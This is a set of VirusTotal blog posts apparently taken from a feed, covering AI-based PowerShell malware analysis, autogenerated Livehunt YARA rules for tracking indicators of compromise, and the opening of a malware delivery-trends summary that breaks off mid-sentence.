<p>As a reminder, <a href="https://blog.virustotal.com/2023/07/virustotal-crowdsourced-ai.html" style="color: #1155cc; text-decoration: none;">Crowdsourced AI</a> is VirusTotal's initiative that taps into the power of diverse AI models and community contributions to fortify our cyber defense strategies. Just two weeks ago, we announced the integration of Hispasec's solution, which is specifically designed for analyzing Microsoft Office documents. As we have explained in the past, these solutions based on AI LLMs can make mistakes, but their contributions are very valuable in complementing other technologies in the analysis and detection of new threats.</p>
<p>This time, the solution offered by NICS Lab serves as a complement to the code explanations already generated by <a href="https://blog.virustotal.com/2023/05/vt-code-insight-updates-and-q-on.html" style="color: #1155cc; text-decoration: none;">Code Insight</a>, which is based on <a href="https://ai.google/discover/palm2/" style="color: #1155cc; text-decoration: none;">Google PaLM</a>. As a result, numerous PowerShell file reports will now benefit from the insight of solutions based on two distinct AI models. This essentially encapsulates VirusTotal’s strategy of embracing diverse threat detection solutions to improve understanding and risk assessment.</p>
<p>Let's explore a few examples:</p>
<p>In this first showcase, we see that two analyses appear in the Crowdsourced AI section: one from NICS Lab and the other from Code Insight. In the case of the former, in addition to the explanation about the file's behavior, we can observe the "Malicious" verdict highlighted in red.</p>
<center>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggj_UxyhxpH85vEPohTDqJs5eih24BBfHKKCWaHuyVHh_-ykKL1ePBKWiu_Y8BBIGjYnnLDeqcDNhmPBUgpuu6RalTDw2g5jIwF7ftbt0UU-ncEFzec8_0T-BRj9HINQnpkzbK0Ux4dxBMUOfD_nMeOsuKqKt34_HSSGpiboHfaid-kYTmiU2EkC5hxAE/s1600/01Example.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" data-original-height="878" data-original-width="1372" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggj_UxyhxpH85vEPohTDqJs5eih24BBfHKKCWaHuyVHh_-ykKL1ePBKWiu_Y8BBIGjYnnLDeqcDNhmPBUgpuu6RalTDw2g5jIwF7ftbt0UU-ncEFzec8_0T-BRj9HINQnpkzbK0Ux4dxBMUOfD_nMeOsuKqKt34_HSSGpiboHfaid-kYTmiU2EkC5hxAE/s1600/01Example.png"/></a></div>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><a href="https://www.virustotal.com/gui/file/f3642eacb95ad7272d5485bc1fbcd7ebb872ebd72e27fc60e0e79d5643006663/detection" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;">f3642eacb95ad7272d5485bc1fbcd7ebb872ebd72e27fc60e0e79d5643006663</span></span></a></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 8pt;"></center>
<p>Similar example, this time with a ransomware case. Here we can see how both models, despite aligning on the overall analysis, complement each other by providing diverse details. The first model, for instance, outlines the file extensions that are encrypted by the ransomware, while the second model highlights the email where the ransom is demanded.</p>
<center>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkZRkJ6pwouNICdY7q_c6gy-4ZKfT_GD-EbEZ4sRwXWOHm-QM4-p6V72O0deQbxYaBIvVpnk4UEFAwHR8Asj1XqL18XLHmWUE-qWYtK75p3nHwoWr-L59ONNJnYECqyplqpygOsKlggwjL9uuso6liwZOMuFl2-7QDwvf3624EWrV2lX9FTk6FgeffEUU/s1600/02Example.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" data-original-height="1095" data-original-width="1372" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkZRkJ6pwouNICdY7q_c6gy-4ZKfT_GD-EbEZ4sRwXWOHm-QM4-p6V72O0deQbxYaBIvVpnk4UEFAwHR8Asj1XqL18XLHmWUE-qWYtK75p3nHwoWr-L59ONNJnYECqyplqpygOsKlggwjL9uuso6liwZOMuFl2-7QDwvf3624EWrV2lX9FTk6FgeffEUU/s1600/02Example.png"/></a></div>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><a href="https://www.virustotal.com/gui/file/ff68ade91babb31db87a5dcb5b1f650cb429ae6eb7d291cda4c0d92e76c5101c/detection" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;">ff68ade91babb31db87a5dcb5b1f650cb429ae6eb7d291cda4c0d92e76c5101c</span></span></a></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 8pt;">
</center>
<br>
<p>The next example shows how the models behave when analyzing a PowerShell file where attackers obfuscated the code by separating the text strings that constitute the instructions, and using a function to replace the encoded strings with their actual values at runtime.</p>
<center>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ8qntNuKAkUYw5YHD35n2fa21eDRkpMTn135G57ofODix2_j96HDgVGYGr01FLqN04IHkeLgeXSVrDgZtfbS49xptU0Zw2aZkSiqQDEnHoq69Qasyxly-Wd39y9Od9FWTQG0sld5ASH62wSKkQxT6XQgjmYxb5GRkIejPt3l6QpZzyxAwwUzxxvHDM90/s1600/Example%203.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" data-original-height="379" data-original-width="2787" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ8qntNuKAkUYw5YHD35n2fa21eDRkpMTn135G57ofODix2_j96HDgVGYGr01FLqN04IHkeLgeXSVrDgZtfbS49xptU0Zw2aZkSiqQDEnHoq69Qasyxly-Wd39y9Od9FWTQG0sld5ASH62wSKkQxT6XQgjmYxb5GRkIejPt3l6QpZzyxAwwUzxxvHDM90/s1600/Example%203.png"/></a></div>
</center>
<br>
<p>As we can see, the sample manages to evade detection by antivirus engines, but the models succeed in deobfuscating its code, analyzing it, and providing an explanation of its behavior.</p>
<center>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjagwnx-Pye6ioA3FCgXg4PXVwMfCllHELTnzmkWpA_2otYvoRVRbsT2q2WIkos4psvjtq846fd_TzM63-zVJeRMVabRT1hie3pFwQc1rAuFsa277cXgUL_jVQUczZEFUIsAqbE1rduJPU4nJFdUgRsU-RrjZGMjsS7D1umw_vzKv83ipEh6GrePVOf3_Q/s1600/03Example.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" data-original-height="1319" data-original-width="1844" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjagwnx-Pye6ioA3FCgXg4PXVwMfCllHELTnzmkWpA_2otYvoRVRbsT2q2WIkos4psvjtq846fd_TzM63-zVJeRMVabRT1hie3pFwQc1rAuFsa277cXgUL_jVQUczZEFUIsAqbE1rduJPU4nJFdUgRsU-RrjZGMjsS7D1umw_vzKv83ipEh6GrePVOf3_Q/s1600/03Example.png"/></a></div>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><a href="https://www.virustotal.com/gui/file/48a7c59575f61e568dbc997db09c707f5b04abfe847d19c084ce955b4f97e648/detection" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;">48a7c59575f61e568dbc997db09c707f5b04abfe847d19c084ce955b4f97e648</span></span></a></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 8pt;"></center>
<p>AI reports’ results are available via VT Intelligence, allowing the use of the "nics_ai_analysis:" modifier to search into the resulting AI’s output, and "nics_ai_verdict:" to search by verdict - malicious, suspicious, or benign. As an example, below we show the results of searching for NICS Lab reports where "telegram" is mentioned and the verdict is "malicious". This search is performed using the following query: nics_ai_analysis:telegram and nics_ai_verdict:malicious.</p>
<center>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwIqFVFX5tj9ibO7bOV2VDzEd-FoYK-mx_BYfyxDSAd9Aq0sF19YMdVU7qwKq2ylhk7Nw5YBbxmsA-v0FAbUMww8pkKVem7XZcI-BBNKULufZUkDos_Yeuo2L6RECKCW6bsuwMjuuwVn3tC5nBd4djkbVcyiKvTUxwzmZzYMmUxsqsUo-pxDwOzjsiXXY/s1600/04%20Example.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" data-original-height="1540" data-original-width="1767" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwIqFVFX5tj9ibO7bOV2VDzEd-FoYK-mx_BYfyxDSAd9Aq0sF19YMdVU7qwKq2ylhk7Nw5YBbxmsA-v0FAbUMww8pkKVem7XZcI-BBNKULufZUkDos_Yeuo2L6RECKCW6bsuwMjuuwVn3tC5nBd4djkbVcyiKvTUxwzmZzYMmUxsqsUo-pxDwOzjsiXXY/s1600/04%20Example.png"/></a></div></center>
<br>
<p>Here is the analysis of the first file that appears in the previous search:</p>
<center>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxw5rOxBYUOXlhNBtsK6iqg5qhFQuNnUHabP0dN7r46j8hCBzKC1UphWXYtUoPCkIhUHoSJQ7NApMmnm6RFKEee1cmK1iLhOTDhlLC26EfPunHQJ-bGVV8dXWQ7K7a1C4hY1a7viuRvzXvsihPRP9Ll9n2_oZ0u3QpXzlsELJUblJ6MB7MZRojqAF_PmY/s1600/05%20Example.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" data-original-height="739" data-original-width="1823" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxw5rOxBYUOXlhNBtsK6iqg5qhFQuNnUHabP0dN7r46j8hCBzKC1UphWXYtUoPCkIhUHoSJQ7NApMmnm6RFKEee1cmK1iLhOTDhlLC26EfPunHQJ-bGVV8dXWQ7K7a1C4hY1a7viuRvzXvsihPRP9Ll9n2_oZ0u3QpXzlsELJUblJ6MB7MZRojqAF_PmY/s1600/05%20Example.png"/></a></div>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><a href="https://www.virustotal.com/gui/file/acc91fccb084496ae0d0864c90d3ae99493cf638189995fb4d8d9f4ecbbf7a52" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;">acc91fccb084496ae0d0864c90d3ae99493cf638189995fb4d8d9f4ecbbf7a52</span></span></a></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 8pt;"></center>
<p>Similarly, the rest of AI models have specific search parameters, such as "hispasec_ai_analysis:", "hispasec_ai_verdict:", and "codeinsight:". Moreover, there are two additional parameters that enable simultaneous searching across all Crowdsourced AI models: "crowdsourced_ai_analysis:" and "crowdsourced_ai_verdict:".</p>
<p>We want to express our gratitude to NICS Lab, for their contribution to the VirusTotal Crowdsourced AI initiative, and congratulate the School of Computer Science and Engineering of the University of Malaga for launching Spain's first-ever degree combining Cybersecurity and Artificial Intelligence. As we forge ahead, welcoming more contributors with diverse skill sets, we remain steadfast in our commitment to building a collaborative, powerful, and diverse defense strategy to tackle the ever-evolving cyber threats. We encourage others to join us in this endeavor.</p>
Bernardo.Quinterohttp://www.blogger.com/profile/17288490159411812678noreply@blogger.com0tag:blogger.com,1999:blog-6871606241422173914.post-69760570423792378332023-08-01T15:00:00.010+02:002023-08-01T15:03:45.529+02:00Actionable Threat Intel (V) - Autogenerated Livehunt rules for IoC tracking<div class="interval_12">As we <a href="https://blog.virustotal.com/2023/07/actionable-threat-intel-iv-yara-beyond.html" target="_blank">previously discussed</a>, YARA Netloc uncovers a whole new dimension for hunting and monitoring by extending YARA support to network infrastructure. All VirusTotal users have already access to different resources, including <a href="https://blog.virustotal.com/2023/07/actionable-threat-intel-iii-introducing.html" target="_blank">templates</a>, a <a href="https://github.com/VirusTotal/vt-public-crowdsourced-yara" target="_blank">GitHub repository</a>, and the <a href="https://developers.virustotal.com/docs/nethunt" target="_blank">official documentation</a> to quickly get started on writing network YARA rules.
</div>
<div class="interval_12">
You can also find excellent external resources, like <a href="https://s1.ai/netloc" target="_blank">this blog post</a> from SentinelOne's Tom Hegel, which discusses the use of YARA Netloc in a real investigation.
</div>
<div class="interval_12">
And as we highlighted in our previous post, this is just the beginning. We are playing with new ideas and features that leverage YARA Netloc, and we couldn't resist implementing a few of them already. In this blog, we will discuss a new functionality that uses YARA Netloc to help us track indicators of compromise (IoCs) and their related infrastructure with just a few clicks.
</div>
<br />
<h2 style="text-align: left;">IoCs subscription</h2>
<div class="interval_12">
You might have noticed that all IoC reports in VirusTotal have a new <b>Follow</b> dropdown menu in the top right corner, which offers a few options.
</div>
<div class="central_img width_80 interval_12">
<img src="https://lh5.googleusercontent.com/RGAJnxzqnybmC-sKwIZTHaYTeR05ydd8hirRP0C6zZT6inn-mNv6Njl8kQfFENv1fZV9iptSjfXv3b7HthMKSqPmjOYzqTLk0ubD1b8mDHrxu-LDl5S0low5esUGoMlKkrf57b3ZEREKDZ_Hdw-RBhiIs9jYva1fxICKZ8qSa1mrsH5i5ja2igFKru5S9Wdi3q_TljhHKQdJvUkWeKVK4Mn0Xou6NijCts7WeA" />
</div>
<div class="interval_12">
The idea of this new feature is to offer VirusTotal’s users easy ways to track any IoCs’ activity. For instance, as shown in the previous screenshot, we are offered to monitor any infrastructure that this malware interacts with in the future (URLs, domains or IPs), or being notified when we see it being downloaded from anywhere.
</div>
<div class="interval_12">
When clicking any of these options, we are creating a one-click <a href="https://www.virustotal.com/gui/hunting/rulesets" target="_blank"><b>Livehunt</b></a> rule based on a template. We can customize the resulting rule as needed, or simply deploy it as suggested, although we highly recommend renaming it to easily identify it.
</div>
<div class="interval_12">
For example, by clicking <b>URLs downloading it</b> in the previous <a href="https://www.virustotal.com/gui/file/2cb42e07dbdfb0227213c50af87b2594ce96889fe623dbd73d228e46572f0125" target="_blank">sample’s report</a>, the following rule will be automatically generated and deployed in our Livehunt:
</div>
<div class="my-yara-code interval_12">
<mark class="blue">import</mark> <mark class="red">"vt"</mark><br /><br />
<mark class="blue">rule</mark> UrlDownloadsFile <mark class="dark-blue">{</mark><br />
<mark class="blue">condition</mark>:<br />
<mark class="orange">// vt.net.url.new_url and // enable to restrict matches to newly seen URLs</mark> <br />
vt.net.url.downloaded_file.sha256 == <mark class="red">"2cb42e07dbdfb0227213c50af87b2594ce96889fe623dbd73d228e46572f0125"</mark> <br />
<mark class="dark-blue">}</mark>
</div>
<div class="interval_12">
This rule will simply track and notify any new URL VirusTotal observes downloading that particular sample.
</div>
<br />
<h2 style="text-align: left;">Livehunt dashboard</h2>
<div class="interval_12">
The <a href="https://www.virustotal.com/gui/hunting/rulesets" target="_blank"><b>Livehunt</b> dashboard</a> consolidates all your team's and your own Livehunt YARA rules in one place. We added three filtering options to help you quickly move around.
<div class="central_img width_40 interval_12">
<img src="https://lh5.googleusercontent.com/EdoOAmk3zh9e6dTlb_pP-ECsvT-zR_xryNEQYKT62Hde219SEDnktPau9yh7OagZG2OfMAonMjstXRJH1WYOg_Y7jqnWHmrpuo8mXA7In8iGpCuFx-an0cxY3kelgAl9P5oV8LOHtAGdr1QkiEt4GaYmoVO_g-eSk14DDw5-UUvketbLGrwgCk7KO50Qlsq9ZiorA5eRTmleZaJ-AKMZsPwIvnuLK8zQUneQbg" />
</div>
<ul>
<li>The first one filters rules <b>created by yourself</b>, <b>created by other users</b> in your VirusTotal group and shared with you, or “<b>Autogenerated</b>” with the IoC’s report <b>Follow</b> option, as previously explained.</li>
<li>The second filter allows you to search for rulesets containing a specific substring in its name or anywhere else in the ruleset, including comments. For example, if we use the hash of the file in the previous example (2cb42e07dbdfb0227213c50af87b2594ce96889fe623dbd73d228e46572f0125), we get the rule we previously created. Please note VirusTotal will automatically add tags corresponding to the to the names of the rules in a ruleset, plus the "<b>Autogenerated</b>" tag if the ruleset was generated with the <b>Follow</b> option:
<div class="central_img width_80 interval_12">
<img src="https://lh5.googleusercontent.com/nGfXbBCd7V9qfhlWz2rIlnIX_SxY4epTftNdUD81mnf3R3AbHpemrIiPGeuyP-SldK6bkHHm6uq00-Gg6gwrlRSJOX2dJjwtoLT8zxdvswpkRn_RO99rIHFj-1QOv1ni_1XDE5ntw5FreinGWKc8MYFPoLZXo-Pw6Wp9QtRf4PKl8QTpfbN4b12pModHrZvA1aDRk1gZcKSTbEaZXnVKouBXdBWDEtK4T8hwfw" />
</div>
</li>
<li>The third one allows you to filter by ruleset status (active or inactive).</li>
</ul>
</div>
<br />
<div class="interval_12">
The dashboard also shows whether rulesets are active, as well as the entity that ruleset matches against. You can also find which users and groups that ruleset was shared with and, lastly, the number of matches - which lists all matching IoCs in the <a href="https://www.virustotal.com/gui/ioc-notifications/all?order=date-" target="_blank"><b>IoC Stream</b></a> by clicking it.
</div>
<div class="central_img width_80 interval_12">
<img src="https://lh6.googleusercontent.com/V7TsovoZbOLYpemCVa7s_w7Md0mnVnWLCYbG0Qj0TCacPfxboUu28WIlBN3Ex3MYZDgGF-jHJTSzT1G2p7UcI3jgcUZ2vWSTcxNbGPiS4pGwvPfaCeppzd333z0dT4UqolA426aIRDvvhuvSVGNFk2jhd97uuNo_FE_8Cps74bSvjd6Eu1X-yPWhOA0-GHYgbvZwwE5DmkOc2crM0qAbBd1oWMRSW13kDpWcCQ" />
</div>
<br />
<h2 style="text-align: left;">Wrapping up</h2>
<div class="interval_12">
In the previous posts in our "<b>Actionable Threat Intel</b>" series we showed how to use the new <a href="https://blog.virustotal.com/2023/07/actionable-threat-intel-iii-introducing.html" target="_blank"><b>YARA editor</b></a>, deploying Livehunt rules from the editor either using templates or from scratch, using <a href="https://blog.virustotal.com/2023/07/actionable-threat-intel-iv-yara-beyond.html" target="_blank"><b>Netloc</b></a> for creating network hunting rules, and how to track IoCs of interest with automatically generated hunting rules.
</div>
<div class="interval_12">
All these elements help us to set the monitoring rulesets we need to be on top of our investigations or any malicious activity set of our interest. <a href="https://www.virustotal.com/gui/ioc-notifications/files?order=date-" target="_blank"><b>IoC Stream</b></a> serves as a single repository to centralize all our notifications, including Hunting rules, <a href="https://www.virustotal.com/gui/threat-landscape/collections?order=lookups_trend-" target="_blank"><b>IoC Collections</b></a> and <a href="https://www.virustotal.com/gui/threat-landscape/threat-actors?search_scope=All%20threat%20actors&order=last_seen_date-" target="_blank"><b>Threat Actors</b></a> subscriptions.
</div>
<div class="interval_12">
Last but not least, we would like to specially thank our colleagues from Mandiant and all the security researchers who kindly offered to help during early stages and beta testing to help make Netloc hunting as good as possible: <br />
Paul Rascagneres (@r00tbsd), Volexity<br />
Ariel Jungheit (@arieljt), Kaspersky<br />
Marc Green (@green0wl), eBay<br />
Vitor Ventura, Cisco<br />
Markus Neis (@markus_neis), Arctic Wolf<br />
Matt Pierce, CrowdStrike<br />
Pasquale Stirparo (@pstirparo), Independent Researcher<br />
Tom Hegel (@TomHegel), SentinelLabs<br />
</div>
<div class="interval_12">
We hope you find these features as useful as we do. If you have any questions or requests please do not hesitate to <a href="https://www.virustotal.com/gui/contact-us/other" target="_blank">contact us</a>.
</div>
<div class="interval_12">
Happy hunting!
</div>
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
.my-yara-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: #F7F9F9;
color: Black;
/*padding: 24px;*/
border-collapse: collapse;
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
mark.dark-blue {
color:Blue;
background: none;
}
.table-container {
/*padding: 32px;*/
font-family: "Courier", sans-serif;
font-size: medium;
}
.table-container table {
width: 100%;
background: #fff;
color: #222;
/*padding: 24px;*/
border-collapse: collapse;
}
.table-container table th {
font-weight: bold!important;
text-transform: none!important;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
.table-container table tr {
border-bottom: 1px solid #eee;
}
@media (max-width: 580px) {
.table-container table thead {
display: none;
}
.table-container table td {
display: block;
}
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
.central_img img {
border: 1px solid #000000;
}
.central_img p {
text-align: center;
font-style: italic;
}
.width_10 {
width: 10%;
}
.width_15 {
width: 15%;
}
.width_20 {
width: 20%;
}
.width_30 {
width: 30%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>
Alexandra Martinhttp://www.blogger.com/profile/08447900589635774086noreply@blogger.comtag:blogger.com,1999:blog-6871606241422173914.post-626854912266654172023-07-26T17:07:00.006+02:002023-08-01T20:04:46.799+02:00VirusTotal Malware Trends Report: Emerging Formats and Delivery Techniques<span id="docs-internal-guid-a3adb4e5-7fff-7a42-e355-202413b6b8c9"><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face=""Google Sans", sans-serif" style="background-color: transparent; color: #4d4d4d; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">We just released a new edition of our “VirusTotal Malware Trends Report” series, where we want to share VirusTotal’s visibility to help researchers, security practitioners and the general public better understand the nature of malicious attacks, this time focusing on “Emerging Formats and Delivery Techniques”. Here are some of the main ideas presented there:</span></p><ul style="margin-bottom: 0px; margin-top: 0px; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #1f1f1f; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-wrap: wrap; vertical-align: baseline;">Email attachments continue to be a popular way to spread malware.</span></p></li><li aria-level="1" dir="ltr" style="font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #1f1f1f; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-wrap: wrap; vertical-align: baseline;">Traditional file types (Excel, RTF, CAB and compressed formats) are becoming less popular. </span><span style="background-color: white; color: #1f1f1f; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-wrap: wrap; vertical-align: baseline;">Although the use of PDFs slowly decreased for the last few months in June 2023 we observed the biggest peak for the last two years.</span></p></li><li aria-level="1" dir="ltr" style="font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #1f1f1f; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-wrap: wrap; vertical-align: baseline;">OneNote and JavaScript (distributed along HTML) are the most rapidly growing formats for malicious attachments in 2023.</span></p></li><li aria-level="1" dir="ltr" style="font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #1f1f1f; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-wrap: wrap; vertical-align: baseline;">OneNote emerged in 2023 as a reliable alternative for attackers to the traditional use of macros in other Office products.</span></p></li><li aria-level="1" dir="ltr" style="color: #1f1f1f; font-family: "Google Sans", sans-serif; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-wrap: wrap; vertical-align: baseline;">ISO files for malware spreading are a flexible alternative for both widespread and targeted attacks. Distribution as heavily compressed attachments makes them difficult to scan by some security solutions.</span></p></li><li aria-level="1" dir="ltr" style="font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="background-color: white; line-height: 1.38; margin-bottom: 6pt; margin-top: 0pt;"><span style="background-color: transparent; color: #1f1f1f; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-wrap: wrap; vertical-align: baseline;">ISO files are being disguised as legitimate installation packages for a variety of software, including Windows, Telegram, AnyDesk, and malicious CryptoNotepad, among others.</span></p></li></ul><div><span face="Google Sans, sans-serif" style="color: #1f1f1f;"><div class="separator" style="clear: both; text-align: center;"><a href="https://assets.virustotal.com/reports/2023-emerging" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" data-original-height="676" data-original-width="733" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJ1ZBD5twWIEfkQ4ByRDJW4nFOOV_CxFeL0tGrOrQVYu7FDMHW3SXTBfKrRcigf5Fsx-vVMYUH285ZiDXjj69AJpXqoCJ_fYIVtZttwqiCk66t1IFZj7Ocfu5-F5nGqz1vNpeG5g6LM-aDORzWOn40mUxoR2DHst6Q-lgMRv4cnKZ_r6ZxD-TdkAiH7lw/s16000/Frame%2096%20(1).png" /></a></div><br /><span style="font-size: 14px; white-space-collapse: preserve;"><br /></span></span></div><div><span id="docs-internal-guid-876b1533-7fff-e942-e227-7b29aa2df4e1"><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face=""Google Sans", sans-serif" style="background-color: transparent; color: #4d4d4d; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">For full details, you can </span><a href="https://assets.virustotal.com/reports/2023-emerging" style="text-decoration-line: none;"><span face=""Google Sans", sans-serif" style="background-color: transparent; color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">download the report here</span></a><span face=""Google Sans", sans-serif" style="background-color: transparent; color: #4d4d4d; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">. </span></p><br /><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face=""Google Sans", sans-serif" style="background-color: transparent; color: #4d4d4d; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">As we usually do, in this blog post we will focus on technical hunting ideas you can use to monitor malicious activity. We also provide additional technical details for some of the most interesting points discussed in the report.</span></p><br /></span></div><div><span id="docs-internal-guid-946f9fdf-7fff-053a-56e1-92a70b3d2050"><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;"><span face="Arial, sans-serif" style="color: #434343; font-size: 14pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space-collapse: preserve;">Monitoring malicious attachments</span></h3><br /><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 3pt 0pt 6pt;"><span face=""Google Sans", sans-serif" style="background-color: transparent; color: #1f1f1f; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">Our data shows that there was an increase in the number of malicious files attached to emails between March and April of 2023. In terms of suspicious attachments, for the past two years, we have observed spikes in the number of suspicious PDF files linked to malicious campaigns. These files can be used for a variety of purposes, such as exploiting vulnerabilities (less usual) or phishing (most of the time).</span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 6pt; margin-top: 0pt; padding: -3pt 0pt 0pt 0pt;"><span face=""Google Sans", sans-serif" style="background-color: transparent; color: #1f1f1f; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">OneNote is 